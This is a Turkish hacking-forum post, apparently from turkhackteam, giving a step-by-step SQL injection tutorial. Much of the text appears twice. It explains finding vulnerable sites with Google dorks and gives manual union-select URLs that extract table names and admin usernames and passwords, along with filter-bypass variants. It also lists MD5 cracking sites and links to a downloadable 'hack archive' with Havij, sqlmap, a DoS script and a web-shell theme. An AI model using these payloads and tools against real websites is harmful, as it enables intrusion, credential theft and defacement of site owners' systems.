[+]SQL nedir:
verileri yönetmek ve tasarlamak için kullanılan bir veritabanı yönetim sistemidir. SQL, kendisi bir programlama dili olmamasına rağmen birçok kişi tarafından programlama dili olarak bilinir. SQL herhangi bir veri tabanı ortamında kullanılan bir alt dildir. SQL ile yalnızca veri tabanı üzerinde işlem yapılabilir. SQL'e özgü cümleler kullanarak veri tabanına kayıt eklenebilir, olan kayıtlar değiştirilebilir, silinebilir ve bu kayıtlardan listeler oluşturulabilir.
[+]SQL Injection Nedir ?
İnternet sitelerinin bir çocuğunda, sayfayı dinamik tutmak için veritabanından yararlanılır. Güncel veritabanı yazılımlarında birçoğunda (MySQL, MSSQL, Sqlite, Oracle SQL) SQL (Structured Query Language) denilen ortak bir dil kullanılır.
SQL Injection, SQL sorgusunun amacına müdahale ederek farklı bilgileri elde etmeye denir.
Yani SQL Injection yöntemi ile üye bilgileri, yönetici şifreleri gibi veritabanında bulunup herkese açık olmayan bilgiler elde edilebilir.
SQL Injection kullanılarak Yahoo! gibi büyük internet sitelerinin bile veritabanları ele geçirilmiştir.
[+]SQL Açıklı Siteleri Nasıl Bulunur
Gerekli Dorkarı Yazarak (üreterek) veya hedef sitede arayarak
örnek birkaç dork:
https://ghostbin.com/paste/pke9a
sql dork [x1x1pezo1x1x] - 8148f1bc
Dork'u googlede Arattık Siteler bulduk peki bunlarda açık olup olmadığını nasıl anlarız ?
id değerinin sonuna ' (tırnak işareti) konulur (%27 ascıı değeride yazılabilir) BKZ:
id=142' veya id=142%27 (siz ' (tırnak işareti) koyunca otomatik olarak ascii değerine dönüşücektir (%27))
[+]Tırnak işareti koyduk sql açığı olup olmadığı nasıl anlaşılır ?
Sayfada
bu tür bir hata olabilir sayfa boşalabilir sayfadaki resimler değişir veya görünmez yani sayfanın bütünlüğü bozulur ise sql açığı vardır
[+]sql açığını bulduk fakat havij ile admin şifrelerini nasıl bulucaz ?
videolu anlatım:
[ame]https://www.youtube.com/watch?v=Zi_mt4S_uYg[/ame]
[ame]https://www.youtube.com/watch?v=8J7jGKW6j1o[/ame]
[+]admin şifresi md5 olarak çıktı ne yapıcağim ?
birçok md5 cracker sitesi var (brute force uyguluyorlar hepsı kırılmaz)
örnek birkaç md5 crack sitesi:
[+]Hedef sitede sql açığını manual olarak aramaktan farklı yöntemler varmı ?
Safe 3 ve acunetix isimli 2 adet güzel ve kolay programımız var acunetix'i heryerde bulabılırsınız safe3'ün birçok linki kırık onun için kendim upload ettim en altta vericem...
[+]manual olarak admın bilgilerini nasıl çekiceğiz ? (bu bölüm AquieLL üstadımızın konusundan alıntıdır.)
[+]windows'da sqlmap ile admin bilgilerini çekebilirmiyiz ?
tabikide hatda video çekecektim fakat sqlmapım arızalandı...
ama
Veteran 7 Online
Saldırı Timleri Genel Lideri
üstadımızın konusu:
http://www.turkhackteam.org/web-ser...n-hack-windows-cmd-uzerinden-veteran-7-a.html
[+]sqlmap'ı kali lunix de kullanabilirmiyiz ?
evet tabikide kullanabilirsiniz örnek video:
[ame]https://www.youtube.com/watch?v=y4nMgoY5fpY[/ame]
[ame]https://www.youtube.com/watch?v=HdPNYub5VP8[/ame]
birçok program söylediniz nereden temin edebiliriz ?
sizin için küçük bir hack arşivi upload ettim:
https://yadi.sk/d/48Yka7IOpWivX
https://docviewer.yandex.com.tr/?ur...eyoriPiDmMnKhY=&name=arşiv.rar&c=56db16f386dc
https://www.virustotal.com/tr/file/...198d75706918e64314385ad4/analysis/1457203132/
içeriği => sqlmap, havij, Login Bypass, Havij 1.16 PRO, Zone-h Poster (zone-h çoklu zone alma) cms,arama motoru, örnek birkaç dork, safe3 (Safe3WVS_en.exe den girin) php dos, tema ile shell upload etmek için shell tema (site sonuna wp-content/themes/twentyten/header.php koyarak k2 shelimize girebilirsiniz)
verileri yönetmek ve tasarlamak için kullanılan bir veritabanı yönetim sistemidir. SQL, kendisi bir programlama dili olmamasına rağmen birçok kişi tarafından programlama dili olarak bilinir. SQL herhangi bir veri tabanı ortamında kullanılan bir alt dildir. SQL ile yalnızca veri tabanı üzerinde işlem yapılabilir. SQL'e özgü cümleler kullanarak veri tabanına kayıt eklenebilir, olan kayıtlar değiştirilebilir, silinebilir ve bu kayıtlardan listeler oluşturulabilir.
[+]SQL Injection Nedir ?
İnternet sitelerinin bir çocuğunda, sayfayı dinamik tutmak için veritabanından yararlanılır. Güncel veritabanı yazılımlarında birçoğunda (MySQL, MSSQL, Sqlite, Oracle SQL) SQL (Structured Query Language) denilen ortak bir dil kullanılır.
SQL Injection, SQL sorgusunun amacına müdahale ederek farklı bilgileri elde etmeye denir.
Yani SQL Injection yöntemi ile üye bilgileri, yönetici şifreleri gibi veritabanında bulunup herkese açık olmayan bilgiler elde edilebilir.
SQL Injection kullanılarak Yahoo! gibi büyük internet sitelerinin bile veritabanları ele geçirilmiştir.
[+]SQL Açıklı Siteleri Nasıl Bulunur
Gerekli Dorkarı Yazarak (üreterek) veya hedef sitede arayarak
örnek birkaç dork:
https://ghostbin.com/paste/pke9a
sql dork [x1x1pezo1x1x] - 8148f1bc
Dork'u googlede Arattık Siteler bulduk peki bunlarda açık olup olmadığını nasıl anlarız ?
id değerinin sonuna ' (tırnak işareti) konulur (%27 ascıı değeride yazılabilir) BKZ:
id=142' veya id=142%27 (siz ' (tırnak işareti) koyunca otomatik olarak ascii değerine dönüşücektir (%27))
[+]Tırnak işareti koyduk sql açığı olup olmadığı nasıl anlaşılır ?
Sayfada
Kod:
ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''id değeri yazar'' Order by date_hot DESC' at line burası değişkendir[+]sql açığını bulduk fakat havij ile admin şifrelerini nasıl bulucaz ?
videolu anlatım:
[ame]https://www.youtube.com/watch?v=Zi_mt4S_uYg[/ame]
[ame]https://www.youtube.com/watch?v=8J7jGKW6j1o[/ame]
[+]admin şifresi md5 olarak çıktı ne yapıcağim ?
birçok md5 cracker sitesi var (brute force uyguluyorlar hepsı kırılmaz)
örnek birkaç md5 crack sitesi:
Kod:
[COLOR="white"]http://tr.freemd5.com/
http://hashtoolkit.com/?utm_source=md5&utm_medium=r&utm_campaign=md5
http://md5cracker.org/
http://www.md5crack.com/
http://www.cmd5.org/
https://www.tobtu.com/md5.php => favorimdir (50,529,455,839 kayıtlı md5 içinden buluyor...)
http://www.md5decrypter.com/
http://www.xmd5.org/
[/COLOR]Safe 3 ve acunetix isimli 2 adet güzel ve kolay programımız var acunetix'i heryerde bulabılırsınız safe3'ün birçok linki kırık onun için kendim upload ettim en altta vericem...
[+]manual olarak admın bilgilerini nasıl çekiceğiz ? (bu bölüm AquieLL üstadımızın konusundan alıntıdır.)
Kod:
1-)Kolon Sayısını Öğrenme :
Site:örneksitemiz.com/index.php?id=30
Arkadaşlar Sitemizin Sonuna (order+by+sayı- ) ( - işaretini getirmeyi unutmayalım)
>> örneksitemiz.com/index.php?id=30+order+by+29-
Eğer Şöyle Bir Hata Gelirse :
Hata: Unknown column 10 in order clause Benzer Bir Hata Çıkarsa ;
>> Kolon Sayısı 29'dan Küçük Tek Tek Aşağı İniyoruz .
>>order+by+28- , order+by+27-, order+by+26 , Site Eski Haline Gelesiye Kadar İniyoruz .
>> order+by+25- ( Sayfa Burda Eski Haline Gelmiş İse KOLON SAYIMIZ 25'Dir . )
2-)Kolonları Yansıtma
Arkadaşlar Burda +union+select+kolon Teker Teker Yazıyoruz. (- Sitenin Sonuna Yine Eklenecektir.)
>>
www.örneksitemiz.com/index.php?id=30 URL Sonuna
>>
www.örneksitemiz.com/index.php?id=30+union+select+1+2+3+4+5+...23+24+25-
Şeklinde Olucak Kolon Sayımız Kaçsa Oraya Kadar Yazacağız.
>>
Şimdi Ekranı Sayılar Yansıyacak 10 ve 13 Yansıdı Diyelim. Bu Sayılardan Birini Seçip İşlemimize Devam Edeceğiz.Eğer Sayılar Yansımazsa Bypass Gerekecek.
>>Bypass
1) Normal: +union +select+1,2,3,4,5,6,7,25
Bypass: +/*!union*/+/*!select*/+1,2,3,4,5,6,7,25
2) Normal:+union +select+1,2,3,4,5,6,7,25
Bypass: +union +(select+1,2,3,4,5,6,7,25)
3) Normal:+union +select+1,2,3,4,5,6,7,25
Bypass: +#union# +#select#+1,2,3,4,5,6,7,25
3-)Tablo İsimlerini Çekmek
-Yansıyan Sayıları ( 10 ve 13) Birini Seçiyoruz .
-10 Seçelim.
A-)www.örneksitemiz.com/index.php?id=30+union+select+1,2,database(),3,4,5, 6,7,8,..,24,25-
Bu Komut Sayesinde Sitenin VeriTabanı İsmini Öğreniyoruz.
B-)www.örneksitemiz.com/index.php?id=30+union+select+1,2,version(),3,4,5,6 ,7,8,..,24,25-
Bu Komut Sayesinde Sitenin VeriTabanı Versiyonunu Öğreniyoruz.
C-)www.örneksitemiz.com/index.php?id=30+union+select+1,2,group_contact(tab le_name),4,5,6,7,8,...,24,25+from+information_sche ma.tables-
information_schema.tables = veritabanındaki tablo isimlerini gösterir
>>schema.tables yerini daha sonra şu komutu yazıyoruz.
information_schema.columns = veritabanındaki kolon isimlerini gösterir
-)www.örneksitemiz/index.php?id=30+union+select+1,2,group_concat(table_name),4,5,...,24,25+from+i nformation_schema.tables+where+tables_schema=database()
Bu kod sayesinde sadece hedef sitenin tablo isimlerini öğreniriz. Şimdi bu kodu gönderelim, gönderdikten sonra sitenin tablo isimleri ekrana yansıyacaktır. Örneğin yansıyan isimleri aşağıya yazalım.
Tablo İsimleri: admin,yerler,etkinlikler,yaptıklarımız
Bizim burada ilgileneceğimiz tablo ismi admin dir.
4-)Tablo İsimlerinden Veriyi Almak
-Adminin Verilerini Alacağız.
www.örneksitemiz.com/index.php?id=30+union+select+1,2,group_concat(CoLumn_Name),4,5,6,7,8+fr om+information_schema.CoLumns+where+TabLeS_schema= database()+and+TabLe_Name=admin
Bu Kodu Gönderdikten Sonra Admin İçindeki Sütunlar Gelecektir. Gelen Sutünlar
ÖRN : user
passaword
e-mail
phone number
Bize Lazım Olanlar " User ve Passaword "
>>
Şimdi Bize Lazım Olan Passaword ve User Sütunlarını Alalım
>>
www.örneksite.com/index.php?id=30+union+select+1,2,group_concat(user,password),4,5,6,7,8+ from+admin
Kodunu Yazıp Sayfayı Yeniliyoruz.
>>
Ve Ekrana User ve Passaword Bilgileri Yansıyacaktır.tabikide hatda video çekecektim fakat sqlmapım arızalandı...
ama
Veteran 7 Online
Saldırı Timleri Genel Lideri
üstadımızın konusu:
http://www.turkhackteam.org/web-ser...n-hack-windows-cmd-uzerinden-veteran-7-a.html
[+]sqlmap'ı kali lunix de kullanabilirmiyiz ?
evet tabikide kullanabilirsiniz örnek video:
[ame]https://www.youtube.com/watch?v=y4nMgoY5fpY[/ame]
[ame]https://www.youtube.com/watch?v=HdPNYub5VP8[/ame]
birçok program söylediniz nereden temin edebiliriz ?
sizin için küçük bir hack arşivi upload ettim:
https://yadi.sk/d/48Yka7IOpWivX
https://docviewer.yandex.com.tr/?ur...eyoriPiDmMnKhY=&name=arşiv.rar&c=56db16f386dc
https://www.virustotal.com/tr/file/...198d75706918e64314385ad4/analysis/1457203132/
içeriği => sqlmap, havij, Login Bypass, Havij 1.16 PRO, Zone-h Poster (zone-h çoklu zone alma) cms,arama motoru, örnek birkaç dork, safe3 (Safe3WVS_en.exe den girin) php dos, tema ile shell upload etmek için shell tema (site sonuna wp-content/themes/twentyten/header.php koyarak k2 shelimize girebilirsiniz)
Son düzenleme:
